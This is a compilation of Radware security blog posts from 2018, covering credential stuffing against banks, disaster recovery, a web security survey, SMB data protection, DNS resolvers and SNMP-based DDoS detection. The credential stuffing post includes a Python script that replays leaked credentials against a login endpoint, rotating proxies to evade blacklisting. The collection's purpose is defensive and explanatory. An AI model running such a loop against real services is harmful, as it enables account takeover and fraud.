

Credential Stuffing Campaign Targets Financial Services

October 23, 2018 — by Daniel Smith


Over the last few weeks, Radware has been tracking a significant Credential Stuffing campaign targeting the financial industry in the United States and Europe.

Background

Credential Stuffing is an emerging threat in 2018 that continues to accelerate as more breaches occur. Today, a breach doesn’t just impact the compromised organization and its users; it also affects every other website where those users have reused the same credentials.

Additionally, resetting passwords for a compromised application only solves the problem locally. Criminals can still leverage those credentials against other applications wherever users have practiced poor credential hygiene.

Credential Stuffing is a subset of brute force attacks but differs from Credential Cracking. Credential Stuffing campaigns do not brute force password combinations; instead, they leverage leaked usernames and passwords in an automated fashion against numerous websites in an attempt to take over users’ accounts through credential reuse.

Criminals, like researchers, collect and mine leaked databases and breached accounts for several reasons. Typically, cybercriminals keep this information for future targeted attacks, sell it for profit or exploit it in fraudulent ways.

The motivations behind the current campaign that Radware is seeing are strictly fraud related. Criminals are using credentials from prior data breaches in an attempt to gain access to and take over users’ bank accounts. These attackers have been seen targeting financial organizations in both the United States and Europe. When significant breaches occur, the compromised email addresses and passwords are quickly leveraged by cybercriminals. Armed with tens of millions of credentials from a recently breached website, attackers will use those credentials along with scripts and proxies to distribute their attack in an automated fashion against financial institutions in an attempt to take over banking accounts. These login attempts can happen in such volumes that they resemble a Distributed Denial of Service (DDoS) attack.

Attack Methods

Credential Stuffing is one of the most commonly used attack vectors by cybercriminals today. It’s an automated web attack in which criminals use lists of breached credentials in an attempt to gain access to and take over accounts across different platforms, exploiting poor credential hygiene. Attackers route their login requests through proxy servers to avoid having their IP addresses blacklisted.

Attackers automate login attempts with millions of previously leaked credentials using general-purpose automation tools like cURL and PhantomJS, or tools designed specifically for the attack like Sentry MBA and SNIPR.
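To make the mechanics concrete, here is a minimal sketch of the traffic pattern these tools automate, suitable only for validating your own application's defenses in a staging environment. The URL, form field names, proxy addresses and credential pairs are hypothetical placeholders.

```python
# A minimal sketch of an automated credential-replay loop, assuming a
# hypothetical staging login endpoint. Tools like Sentry MBA automate
# exactly this pattern at much larger scale.
import requests

LOGIN_URL = "https://staging.example.com/login"                      # placeholder
PROXIES = ["http://203.0.113.10:8080", "http://203.0.113.11:8080"]   # placeholders

def try_credentials(pairs):
    """Replay leaked username/password pairs, rotating through proxies."""
    for i, (user, password) in enumerate(pairs):
        proxy = PROXIES[i % len(PROXIES)]   # rotate source IP to evade blacklisting
        resp = requests.post(
            LOGIN_URL,
            data={"username": user, "password": password},
            proxies={"https": proxy},
            timeout=10,
        )
        # A 200 reply with a session cookie typically signals a takeover;
        # otherwise the tool simply moves on to the next pair.
        if resp.ok and "session" in resp.cookies:
            print(f"valid pair found: {user}")

try_credentials([("alice@example.com", "hunter2"), ("bob@example.com", "letmein")])
```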

This threat is dangerous to both consumers and organizations due to the ripple effect caused by data breaches. When a company is breached, the compromised credentials will either be used by the attacker or sold to other cybercriminals. Once the credentials reach their final destination, a for-profit criminal will use that data, or credentials obtained from a leak site, in an attempt to take over user accounts on multiple websites such as social media, banking and marketplaces. In addition to the threat of fraud and identity theft to the consumer, organizations have to mitigate credential stuffing campaigns that generate high volumes of login requests, eating up resources and bandwidth in the process.

Credential Cracking

Credential Cracking attacks are automated web attacks in which criminals attempt to crack users’ passwords or PINs by processing all possible combinations of characters in sequence. These attacks are only possible when applications lack a lockout policy for failed login attempts.

Attackers will use a list of common words or recently leaked passwords in an automated fashion in an attempt to take over a specific account. Software for this attack attempts to crack the user’s password by mutating and brute forcing values until the attacker is successfully authenticated.
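A lockout policy is the control that breaks this attack: once an account accumulates too many failed attempts within a window, further guesses are refused. Below is a minimal in-memory sketch; the thresholds and storage are illustrative assumptions, and a production system would persist counters and also throttle per source.

```python
# A minimal sketch of a failed-login lockout policy, assuming an
# in-memory store. Thresholds are illustrative, not prescriptive.
import time

MAX_FAILURES = 5          # failed attempts allowed before lockout
LOCKOUT_SECONDS = 900     # 15-minute lockout window

_failures = {}            # account -> (failure count, first failure timestamp)

def is_locked_out(account: str) -> bool:
    count, first = _failures.get(account, (0, 0.0))
    if count >= MAX_FAILURES and time.time() - first < LOCKOUT_SECONDS:
        return True       # refuse further guesses during the lockout window
    if time.time() - first >= LOCKOUT_SECONDS:
        _failures.pop(account, None)   # window expired: reset the counter
    return False

def record_failure(account: str) -> None:
    count, first = _failures.get(account, (0, time.time()))
    _failures[account] = (count + 1, first)
```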

Targets

In recent campaigns, Radware has seen financial institutions targeted in both the United States and Europe by Credential Stuffing campaigns.

Crimeware

Sentry MBA – Credential Stuffing Toolkit

Sentry MBA is one of the most popular Credential Stuffing toolkits used by cybercriminals today. This tool is hosted on the Sentry MBA crackers forum. The tool simplifies and automates the process of checking credentials across multiple websites and allows the attackers to configure a proxy list so they can anonymize their login requests.

SNIPR – Credential Stuffing Toolkit

SNIPR is a popular Credential Stuffing toolkit used by cybercriminals and is found hosted on the SNIPR crackers forums. SNIPR comes with over 100 config files preloaded and the ability to upload personal config files to the public repository.

Reasons for Concern

Recent breaches over the last few years have exposed hundreds of millions of user credentials. One of the main reasons for concern in a Credential Stuffing campaign is the impact it has on users. Users who reuse credentials across multiple websites expose themselves to an increased risk of fraud and identity theft.

The second concern is for organizations that have to mitigate high volumes of fraudulent login attempts, which can saturate a network. This saturation is a cause for concern because it will appear to be a DDoS attack originating from random IP addresses and a variety of sources, including hosts behind proxies. The requests will look like legitimate attempts since the attacker is not running a brute force attack: if the user:pass combination does not exist or fails to authenticate on the targeted application, the program simply moves on to the next set of credentials.

Mitigation

In order to defend against a Credential Stuffing campaign, organizations need to deploy a WAF that can properly fingerprint and identify malicious bot traffic as well as automated login attacks directed at their web applications. Radware’s AppWall addresses the multiple challenges posed by Credential Stuffing campaigns by introducing additional layers of mitigation, including activity tracking and source blocking.

Radware’s AppWall is a Web Application Firewall (WAF) capable of securing Web applications and enabling PCI compliance by mitigating web application security threats and vulnerabilities. It prevents data from leaking or being manipulated, which is critically important for sensitive corporate data and customer information.

The AppWall security filter also detects such intrusion attempts by checking the replies sent from the Web server for Bad/OK replies within a specific timeframe. In the event of a Brute Force attack, the number of Bad replies from the Web server (due to a bad username, incorrect password, etc.) triggers the BruteForce security filter to monitor and take action against that specific attacker. This blocking method prevents a hacker from using automated tools to carry out an attack against a Web application’s login page.
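The sketch below illustrates this style of reply-based detection in simplified form: count "Bad" replies per source inside a sliding window and flag sources that exceed a threshold. It is an illustration of the general technique only, with assumed status codes and thresholds, not AppWall's actual implementation.

```python
# A simplified illustration of reply-based brute-force detection: count
# failed-login replies per source IP in a sliding window and flag sources
# that exceed a threshold. All values here are illustrative assumptions.
import time
from collections import defaultdict, deque

WINDOW_SECONDS = 60
MAX_BAD_REPLIES = 20

_bad_replies = defaultdict(deque)   # source IP -> timestamps of "Bad" replies

def observe_reply(source_ip: str, status_code: int) -> bool:
    """Record a web server reply; return True if the source should be blocked."""
    now = time.time()
    if status_code in (401, 403):                  # "Bad" replies: rejected logins
        q = _bad_replies[source_ip]
        q.append(now)
        while q and now - q[0] > WINDOW_SECONDS:   # expire entries outside the window
            q.popleft()
        return len(q) > MAX_BAD_REPLIES
    return False
```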

In addition to these steps, network operators should apply two-factor authentication where eligible and monitor dumped credentials for potential leaks or threats.
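Monitoring dumped credentials can be partially automated. The sketch below checks a candidate password against the Have I Been Pwned "Pwned Passwords" corpus using its k-anonymity range API, so only the first five hex characters of the password's SHA-1 hash ever leave your network. Wiring this into a password-change flow is one way to reject credentials already circulating in dumps.

```python
# A minimal sketch of screening a password against known breach corpora via
# the Have I Been Pwned range API (k-anonymity: only a 5-character hash
# prefix is sent; matching is done locally against the returned suffixes).
import hashlib
import requests

def times_pwned(password: str) -> int:
    digest = hashlib.sha1(password.encode()).hexdigest().upper()
    prefix, suffix = digest[:5], digest[5:]
    resp = requests.get(f"https://api.pwnedpasswords.com/range/{prefix}", timeout=10)
    resp.raise_for_status()
    for line in resp.text.splitlines():            # each line: "SUFFIX:COUNT"
        candidate, _, count = line.partition(":")
        if candidate == suffix:
            return int(count)
    return 0

if times_pwned("password123"):
    print("This password appears in known credential dumps; reject it.")
```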

Effective Web Application Security Essentials

  • Full OWASP Top-10 coverage against defacements, injections, etc.
  • Low false positive rate – using negative and positive security models for maximum accuracy
  • Auto policy generation capabilities for the widest coverage with the lowest operational effort
  • Bot protection and device fingerprinting capabilities to overcome dynamic IP attacks and achieve improved bot detection and blocking
  • Securing APIs by filtering paths, understanding XML and JSON schemas for enforcement, and activity tracking mechanisms to trace bots and guard internal resources
  • Flexible deployment options – on-premise, out-of-path, virtual or cloud-based

Read “Radware’s 2018 Web Application Security Report” to learn more.



Disaster Recovery: Data Center or Host Infrastructure Reroute

October 11, 2018 — by Daniel Lakier


Companies, even large ones, haven’t considered disaster recovery plans outside of their primary cloud provider’s own infrastructure as regularly as they should. In March of this year, Amazon Web Services (AWS) had a massive failure which directly impacted some of the world’s largest brands, taking them offline for several hours. In this case it was not a malicious attack, but the end result was the same: an outage.

When the organizations’ leadership questioned their IT departments on how this outage could happen, most received an answer that was somehow acceptable: it was AWS. Amazon failed, not us. However, that answer should not be acceptable.

AWS may imply it is invulnerable, but the people running IT departments are there for a reason. They are meant to be skeptics, and it is their job to build redundancies that protect the system against any single point of failure. Some of those companies use AWS disaster recovery services, but if the data center and all the technology required to activate those fail-safes crashes, then you’re down. This is why we need to treat the problem with the same logic that we use for any other system. Today it is easier than ever to create a resilient, DoS-resistant architecture that takes not only traditional malicious activity into account but also critical business failures. The solution isn’t purely technical either; it needs to be based upon sound business principles using readily available technology.

[You might also like: DDoS Protection is the Foundation for Application, Site and Data Availability]

In the past, enterprise disaster recovery architecture revolved around having a fully operational secondary location; if we wanted true resiliency, that was the only option. Today, although that can still be one of the foundational pillars of your approach, it doesn’t have to be the only answer. You need to be more circumspect about what your requirements are and choose the right solution for each environment/problem. For example:

  • You can still build it, either in your own data center or in a cloud (match the performance requirements to a business value equation).
  • Several ‘Backup-as-a-Service’ providers offer more than just storage in the cloud; they offer resources for rent (servers to run your corporate environments in case of an outage). If your business can sustain an environment going down just long enough to turn it back on (several hours), this can be a very cost-effective solution.
  • For non-critical items, rely on the cloud provider you currently use to provide near-time failure protection.

The Bottom Line

Regardless of which approach you take, even if everything works flawlessly, you still need to address the ‘brownout’ phenomenon: the time it takes for services to be restored at the primary or at a secondary location. It is even more important to automatically send people to a different location if performance is impaired. Many people have heard of GSLB, and while many use it today, it is not part of their comprehensive DoS approach. But it should be. If your goal with your DDoS mitigation solution is to ensure uninterrupted service in addition to meeting your approved performance SLA, then dynamic GSLB, or infrastructure-based performance load balancing, has to be an integral part of any design.
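Conceptually, dynamic GSLB reduces to a simple decision loop: probe every site, discard the unhealthy ones, and steer each user to the best performer. The sketch below shows that logic in miniature; the site names and health-check URLs are hypothetical, and a real deployment would answer DNS queries with the chosen site's address and probe from multiple vantage points.

```python
# A minimal sketch of performance-based GSLB site selection, assuming
# hypothetical health-check endpoints per site.
import requests

SITES = {
    "us-east": "https://us-east.example.com/health",   # placeholder endpoints
    "eu-west": "https://eu-west.example.com/health",
}

def pick_site() -> str | None:
    """Return the fastest healthy site, or None if every site is down."""
    latencies = {}
    for name, url in SITES.items():
        try:
            resp = requests.get(url, timeout=2)
            if resp.ok:
                latencies[name] = resp.elapsed.total_seconds()
        except requests.RequestException:
            continue    # site is down or degraded: reroute users elsewhere
    return min(latencies, key=latencies.get) if latencies else None

print(pick_site())
```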

We can deploy this technology purely defensively, as we have traditionally done with all DoS investments, or we can change the paradigm and deploy it to help us exceed expectations. This allows us to give each individual user the best experience possible. Radware’s dynamic performance-based route optimization solution (GSLB) allows us to offer a unique customer experience to each and every user regardless of where they come from, how they access the environment or what they are trying to do. The same technology allows us to reroute users in the event of a DoS event that takes down an entire site, be it from malicious behavior, hardware failure or simple human error. This functionality can be procured as a product or a service, as it is environment/cloud agnostic and relatively simple to deploy. It is not labor intensive and may be the least expensive part of an enterprise DoS architecture.

What we can conclude is that any company that blames the cloud provider for a downed site in the future should be asked the hard questions, because solving this problem is easier today than ever before.

Read “Radware’s 2018 Web Application Security Report” to learn more.



Are Your Applications Secure?

October 3, 2018 — by Ben Zilberman


Executives express mixed feelings and a surprisingly high level of confidence in Radware’s 2018 Web Application Security Report. 

As we close out a year of headline-grabbing data breaches (British Airways, Under Armour, Panera Bread), the introduction of GDPR and the emergence of new application development architectures and frameworks, Radware examined the state of application security in its latest report. This global survey of executives and IT professionals yielded insights about threats, concerns and application security strategies.

The common trend across a variety of application security challenges (data breaches, bot management, DDoS mitigation, API security and DevSecOps) was the high level of confidence reported by those surveyed: 90% of all respondents across regions reported confidence that their security model is effective at mitigating web application attacks.

Attacks against applications are at a record high and sensitive data is shared more than ever. So how can execs and IT pros have such confidence in the security of their applications?

To get a better understanding, we researched the current threat landscape and the application protection strategies organizations currently employ. Contradictory evidence stood out immediately:

  • 90% suffered attacks against their applications
  • One in three shared sensitive data with third parties
  • 33% allowed third parties to create/modify/delete data via APIs
  • 67% believed a hacker can penetrate their network
  • 89% saw web-scraping as a significant threat to their IP
  • 83% run bug bounty programs to find vulnerabilities they miss

There were quite a few threats to application services that were not properly addressed, challenging traditional security approaches. In parallel, the adoption of emerging frameworks and architectures, which rely on numerous integrations with multiple services, adds more complexity and increases the attack surface.

Current Threat Landscape

Last November, OWASP released a new list of top 10 vulnerabilities in web applications. Hackers continue to use injections, XSS, and a few old techniques such as CSRF, RFI/LFI and session hijacking to exploit these vulnerabilities and gain unauthorized access to sensitive information. Protection is becoming more complex as attacks come through trusted sources such as a CDN, encrypted traffic, or APIs of systems and services we integrate with. Bots behave like real users and bypass challenges such as CAPTCHA, IP-based detection and others, making it even harder to secure and optimize the user experience.

[You might also like: WAFs Should Do A Lot More Against Current Threats Than Covering OWASP Top 10]

Web application security solutions must be smarter and address a broad spectrum of vulnerability exploitation scenarios. On top of protecting the application from these common vulnerabilities, they must also protect APIs, mitigate DoS attacks, manage bot traffic and distinguish legitimate bots (search engines, for instance) from bad ones like botnets and web-scrapers.

DDoS Attacks

63% suffered a denial-of-service attack against their application. DoS attacks render applications inoperable by exhausting application resources. Buffer overflows and HTTP floods were the most common types of DoS attack, and this form of attack is more common in APAC. 36% find HTTP/Layer-7 DDoS the most difficult attack to mitigate. Half of organizations take rate-based approaches (such as limiting the number of requests from a certain source, or simply buying a rate-based DDoS protection solution), which become ineffective once the threshold is exceeded and real users can’t connect.

API Attacks

APIs simplify the architecture and delivery of application services and make digital interactions possible. Unfortunately, they also introduce a wide range of risks and vulnerabilities, serving as a backdoor for hackers to break into networks. Through APIs, data is exchanged over HTTP, where both parties receive, process and share information. A third party is theoretically able to insert, modify, delete and retrieve content from applications. This is nothing but an invitation to attack (a sketch of the most commonly missing controls follows the lists below):

  • 62% of respondents did not encrypt data sent via API
  • 70% of respondents did not require authentication
  • 33% allowed third parties to perform actions (GET/POST/PUT/DELETE)

Attacks against APIs:

  • 39% Access violations
  • 32% Brute-force
  • 29% Irregular JSON/XML expressions
  • 38% Protocol attacks
  • 31% Denial of service
  • 29% Injections
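As referenced above, the sketch below shows the two controls most often missing according to the survey: transport encryption and token authentication in front of every API method. The framework choice (Flask), route and token handling are assumptions made for the sake of a compact example, not a recommendation of any particular stack.

```python
# A minimal sketch of API hardening: serve only over TLS and require a
# bearer token before honoring any GET/POST/PUT/DELETE. Token handling
# here is deliberately simplified; use a real secret store in production.
from flask import Flask, abort, request

app = Flask(__name__)
VALID_TOKENS = {"s3cr3t-example-token"}   # illustrative placeholder

@app.before_request
def require_auth():
    auth = request.headers.get("Authorization", "")
    token = auth.removeprefix("Bearer ")
    if token not in VALID_TOKENS:
        abort(401)    # unauthenticated callers never reach a handler

@app.route("/items/<item_id>", methods=["GET", "POST", "PUT", "DELETE"])
def items(item_id):
    return {"id": item_id, "method": request.method}

# Run behind TLS, e.g. app.run(ssl_context="adhoc"), so data is encrypted in transit.
```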

Bot Attacks

The amount of both good and bad bot traffic is growing. Organizations are forced to increase network capacity and need to be able to precisely tell friend from foe so that both customer experience and security are maintained. Surprisingly, 98% claimed they can make such a distinction. However, a similar share sees web-scraping as a significant threat, and 87% were impacted by such an attack over the past 12 months despite the variety of methods companies use to overcome the challenge: CAPTCHA, in-session termination, IP-based detection or even buying a dedicated anti-bot solution.

Impact of Web-scraping:

  • 50% gathered pricing information
  • 43% copied website
  • 42% theft of intellectual property
  • 37% inventory queued/being held by bots
  • 34% inventory held
  • 26% inventory bought out

Data Breaches

Multinational organizations keep close tabs on what kinds of data they collect and share. However, almost every other business (46%) reports having suffered a breach. On average an organization suffers 16.5 breach attempts every year. Most (85%) take between hours and days to discover. Data breaches are the most difficult attack to detect, as well as mitigate, in the eyes of our survey respondents.

How do organizations discover data breaches?

  • 69% Anomaly detection tools/SIEM
  • 51% Darknet monitoring service
  • 45% Information was leaked publicly
  • 27% Ransom demand

Impact of Attacks

Negative consequences such as loss of reputation, customer compensation, legal action (more common in EMEA), churn (more common in APAC), stock price drops (more common in AMER) and executives who lose their jobs are quick to follow a successful attack. Repairing the damage to a company’s reputation, by contrast, is a long process that is not always successful. About half of respondents admitted having encountered such consequences.

Securing Emerging Application Development Frameworks

The rapidly growing number of applications, and their distribution across multiple environments, requires constant adjustment, and every change to an application introduces variations across those environments. It is nearly impossible to deploy and maintain the same security policy efficiently across all environments. Our research shows that roughly 60% of all applications undergo changes on a weekly basis. How can the security team keep up?

While 93% of organizations use a web application firewall (WAF), only three in ten use a WAF that combines both positive and negative security models for effective application protection.

Technologies Used By DevOps

  • 63% – DevOps and Automation Tools
  • 48% – Containers (3 in 5 use Orchestration)
  • 44% – Serverless / FaaS
  • 37% – Microservices

Among the respondents that use microservices, one-half rated data protection as the biggest challenge, followed by availability assurance, policy enforcement, authentication and visibility.

Summary

Is there a notion that organizations are confident? Yes. Is that a false sense of security? Yes. Attacks are constantly evolving, and security measures are not foolproof. Having application security tools and processes in place may provide a sense of control, but they are likely to be breached or bypassed sooner or later. Another question we are left with is whether senior management is fully aware of the day-to-day incidents. Rightfully, they look to their internal teams tasked with application security to manage the issue, but there seems to be a disconnect between their perception of the effectiveness of their organizations’ application security strategies and the actual exposure to risk.

Read “Radware’s 2018 Web Application Security Report” to learn more.



Protecting Sensitive Data: The Death of an SMB

September 26, 2018 — by Mike O'Malley


True or False?

90% of small businesses lack any type of data protection for their company and customer information.

The answer?

Unfortunately true.

Due to this lack of care, 61% of data breach victims are specifically small businesses, according to Verizon’s 2018 Data Breach Investigations Report.

Although large corporations garner the most attention in mainstream headlines, small and mid-sized businesses (SMBs) are increasingly attractive to hackers because of the combination of valuable records and lack of security protections. Sensitive data protection should be a high priority not just for large companies but for organizations of all sizes.

While large corporations house large amounts of data, they are also capable of supporting their data centers with the necessary protections. The combination of scarce security resources and a wealth of sensitive personal information is what makes smaller businesses perfect targets for attackers. Hackers aren’t simply looking at how much information they can gather, but at the ease of access to that data, an area where SMBs are largely deficient.

The bad publicity and dark connotation that data breaches hold create a survive-or-die situation for SMBs, but there are ways SMBs can mitigate the threat despite limited resources – and they exist in the cloud.

The Struggle to Survive

Because of their smaller stature, most SMBs struggle to manage cybersecurity protections and attack mitigation, especially data breaches. In fact, financial services company UPS Capital found that 60% of smaller businesses go out of business within six months of a cyberattack. Unlike business giants, SMBs cannot afford the financial hit of a data breach.

Security and privacy of sensitive data is a hot topic in today’s society and increasingly influences customers’ purchase decisions. Customers are willing to pay more for security protections. Auditing giant KPMG reports that for mobile service providers alone, consumers would not hesitate to switch carriers if one provided better security than the other, as long as pricing is competitive, or even at a moderate premium.

[You might also like: Protecting Sensitive Data: What a Breach Means to Your Business]

One Person Just Isn’t Enough

Many SMBs tend to prioritize their business over cybersecurity because of the false belief that attackers will go after large companies first. The Ponemon Institute reports that 51% of its survey respondents say their company believes it is too small to be targeted. Businesses that do invest in cybersecurity often focus narrowly on anti-virus solutions and neglect other types of attacks, such as DDoS, malware and system exploits, that intrusion detection systems can protect against.

Auto dealerships, for example, are typically family-owned and operated businesses valued at around $4 million USD, with an average of 15-20 employees. Because of that size, there is typically only one employee managing IT responsibilities. Dealerships attempt to satisfy the need for security protection with this one employee, who may have relevant certifications and experience and the resources to support day-to-day tasks, but not to manage high-level attacks and threats. Ponemon Institute research reports that 73% of respondents believe they are unable to achieve fully effective IT security because of insufficient personnel.

A study conducted by news publication Automotive News found that 33% of consumers lack confidence in the protection of sensitive data at dealerships. The seriousness of cybersecurity protection, however, should correlate not with the number of employees but with the amount and value of the sensitive data collected. The common error dealerships make isn’t a lack of care in their handling of sensitive data, but an underestimation of their likelihood of being attacked.

Dealerships collect valuable consumer information, both personal and financial, ranging from driver’s license information to social security numbers, bank account information and even past vehicle records. An insufficient budget for, and management of, IT security makes auto dealerships a prime target. In fact, in 2016 software company MacKeeper revealed a massive data breach of 120+ U.S. dealership systems made available on Shodan, a search engine for connected but unsecured databases and devices. The source of the breach originated from backing up individual data systems to the vendor’s common central systems without any cybersecurity protections in place.

The Answer is in the Clouds

Cybersecurity is often placed on the back burner of company priorities, perceived as an unnecessary expenditure because companies underestimate their likelihood of being attacked. However, the level of protection over personal data is highly valued among today’s consumers and can be the deciding factor in which OS or mobile app/site people frequent, and likely which SMB they patronize.

Witnessing the growing trend of data breaches and the rapid advancements of cyberattacks, SMBs are taking note and beginning to increase spending. It is crucial for organizations to not only increase their security budget but to spend it effectively and efficiently. Research firm Cyren and Osterman Research found that 63% of SMBs are increasing their security spending, but still experience breaches.

Internal security systems may seem more secure to smaller business owners, but SMBs lack the necessary security architecture and expertise to safeguard the data being housed. Cloud solutions offer what these businesses need: data storage with better security protection services. Yet in the same Cyren and Osterman Research report, only 29% of IT managers were open to utilizing cloud services. By adopting cloud-based security, small- and medium-sized businesses no longer have to depend on one-person IT departments and can focus on growing their business. Cloud-based security solutions provide enterprise-grade protection alongside the improved flexibility and agility that smaller organizations typically lack compared to their large-scale brethren.

Managed security vendors offer a range of fully-managed cloud security solutions for cyberattacks from WAF to DDoS. They are capable of providing more accurate real-time protection and coverage. Although the security is provided by an outside firm, reports and audits can be provided for a deeper analysis of not only the attacks but the company’s defenses. Outsourcing this type of security service to experts enables SMBs to continue achieving and prioritizing their business goals while protecting their work and customer data.

Read the “2018 C-Suite Perspectives: Trends in the Cyberattack Landscape, Security Threats and Business Impacts” to learn more.



Free DNS Resolver Services and Data Mining

August 22, 2018 — by Lior Rozen


Why would companies offer free DNS recursive servers? DNS data is extremely valuable for threat intelligence. If a company runs a recursive DNS for consumers, it can collect data on new domains that “pop up”. It can analyze trends, build baselines on domain resolution and enrich its threat intelligence overall (machine learning and big data are often used here). Companies can also sell this data to advertisers to measure site ratings and build user profiles.

The DNS resolver market for consumers is ruled by ISPs, as well as some other well-known servers from Google (8.8.8.8) and Level3 (CenturyLink). Since Cisco bought OpenDNS in August 2015, it has also become a major player, offering DNS services for individuals and organizations with its cloud security platform, Umbrella. Cisco OpenDNS focuses on malware prevention, as well as parental control for consumers. Akamai is also in the market, offering both recursive DNS for enterprises (a rather new service, based on its 2015 acquisition of Xerocole) and authoritative DNS services for its CDN clients. In several publications, Akamai claims to see more than 30% of internet data and uses this data as an add-on feed to its KONA service.

[You might also like: DNS and DNS Attacks]

In the fall of 2017, IBM announced its new quad 9 (9.9.9.9) DNS service. This security-focused DNS uses IBM’s threat intelligence to prevent resolving known malicious domains (and protect against malware), with approximately 70 servers worldwide. It claims to offer decent speed, and IBM has promised not to store any personally identifiable information (PII). On April 1, 2018, Cloudflare came out with a new quad 1 resolver (1.1.1.1) that focuses on speed. With more than 1,000 servers, it promises to be the fastest resolver to any location. Additionally, Cloudflare promises never to sell the resolving user data and to delete the resolver logs every 24 hours. Several independent measurements have confirmed Cloudflare’s success on speed: it is typically the fastest after the ISP resolver. The one issue with such a large number of servers is propagation time, as quad 1 takes significantly longer than other DNS providers to pick up changed DNS records.

Another DNS initiative is DoH, or DNS over HTTPS. This is a new standard proposal which can be viewed as the encrypted version of DNS (as HTTPS is to HTTP). The focus here is on both privacy and security, as DNS requests are carried over HTTPS to prevent any interception of the request. Even if a user configures a different DNS resolver, the ISP can still track clear-text DNS requests, log them, or override them to use its own resolver; the DoH protocol prevents this. Two major cloud DNS recursive servers support the protocol, the recent quad 1 by Cloudflare and Google’s DNS, as well as some smaller ones. Mozilla recently ran a PoC with native Firefox support for DoH, which was described here by Ars Technica.
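To make the mechanics concrete, the sketch below performs a lookup against Cloudflare's public JSON DoH endpoint: the DNS question and answer travel inside an ordinary HTTPS exchange, so an on-path observer (including the ISP) sees only a TLS session to the resolver.

```python
# A minimal sketch of a DoH lookup using Cloudflare's JSON endpoint.
# The query rides over HTTPS, so it cannot be read or rewritten in transit.
import requests

def doh_lookup(name: str, record_type: str = "A") -> list[str]:
    resp = requests.get(
        "https://cloudflare-dns.com/dns-query",
        params={"name": name, "type": record_type},
        headers={"accept": "application/dns-json"},
        timeout=10,
    )
    resp.raise_for_status()
    # The JSON body mirrors a DNS response; "Answer" holds the records.
    return [answer["data"] for answer in resp.json().get("Answer", [])]

print(doh_lookup("example.com"))
```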

[You might also like: DNS Reflective Attacks]

As we’ve shown, DNS continues to evolve, both as a spec and as a service. Companies continue to invest a lot of money in collecting DNS data because they see the value in it. While each company provides a slightly different service, most are looking to mine the data for their own purposes. To do that, companies are happy to provide DNS service for free and compete in this saturated market.

Read “Radware’s 2017-2018 Global Application & Network Security Report” to learn more.



Can SNMP (Still) Be Used to Detect DDoS Attacks?

August 9, 2018 — by Pascal Geenens


SNMP is an Internet Standard protocol for collecting information about managed devices on IP networks. It became a vital component in many networks for monitoring the health and resource utilization of devices and connections, and for a long time it was the tool for monitoring bandwidth and interface utilization. In this capacity, it is used to detect line saturation events caused by volumetric DDoS attacks on an organization’s internet connection. SNMP is adequate as a sensor for threshold-based volumetric attack detection and allows automated redirection of internet traffic through cloud scrubbing centers when under attack. By automating detection, mitigation time can be considerably reduced and volumetric attacks mitigated through on-demand cloud DDoS services. SNMP has minimal impact on the device’s configuration and works with pretty much any network device and vendor. As such, it is very convenient and has gained popularity for automatic diversion deployments.
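A minimal version of such threshold-based detection is sketched below: poll a 64-bit interface counter twice over SNMP, derive bits per second, and compare against the link capacity. It assumes the net-snmp snmpget CLI is installed; the host, community string, interface index and link capacity are illustrative placeholders.

```python
# A minimal sketch of threshold-based volumetric detection over SNMP,
# polling ifHCInOctets (64-bit inbound octet counter) via the net-snmp CLI.
import subprocess
import time

HOST, COMMUNITY, IF_INDEX = "192.0.2.1", "public", 1   # placeholders
LINK_BPS = 1_000_000_000                               # assumed 1 Gbps uplink
SATURATION = 0.90                                      # alert above 90% utilization

def in_octets() -> int:
    oid = f"1.3.6.1.2.1.31.1.1.1.6.{IF_INDEX}"         # ifHCInOctets.<ifIndex>
    out = subprocess.run(
        ["snmpget", "-v2c", "-c", COMMUNITY, "-Ovq", HOST, oid],
        capture_output=True, text=True, check=True,
    )
    return int(out.stdout.strip())

first = in_octets()
time.sleep(30)                                         # polling interval
bps = (in_octets() - first) * 8 / 30                   # octets -> bits per second
if bps > SATURATION * LINK_BPS:
    print("Inbound utilization above threshold: trigger diversion to scrubbing.")
```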


DNS: Strengthening the Weakest Link

August 2, 2018 — by Radware


One in three organizations hit by DDoS attacks experienced an attack against their DNS server. Why is DNS such an attractive target? What are the challenges associated with keeping it secure? Which attack vectors represent the worst of the worst when it comes to DNS assaults? Based on research from Radware’s 2017-2018 Global Application & Network Security Report, this piece answers all those questions and many more.


Be Certain and Specific when Fighting DDoS Attacks

July 19, 2018 — by Ray Tamasovich


I was visiting a prospect last week, and at the very beginning of the meeting he asked directly, “Why would I consider your products and services over the many others that claim to do the exact same thing?” I immediately said, “That’s easy! Certainty and specificity.” He looked at me, expecting more than a five-word answer. When I did not provide one, he asked me to please explain. I told him that any number of products or services on the market are capable of keeping your circuits from being overrun by a volumetric DDoS attack, but that if he wanted to be certain he was not blocking legitimate business users or customers, and if he wanted to be specific about the traffic he was scrubbing, he would need to consider my solution.


Building Tier 1 IP Transit – What’s Involved and Why Do It?

July 11, 2018 — by Richard Cohen


Not all internet connectivity is created equal. Many Tier 2 and Tier 3 ISPs, cloud service providers and data integrators consume IP Transit sourced from Tier 1 wholesale ISPs (those ISPs that build and operate their own fabric from L1 services up). In doing so, their ability to offer customers internet services customised to particular requirements is limited by the choices available to them, and many aspects of the services they consume may not be optimal.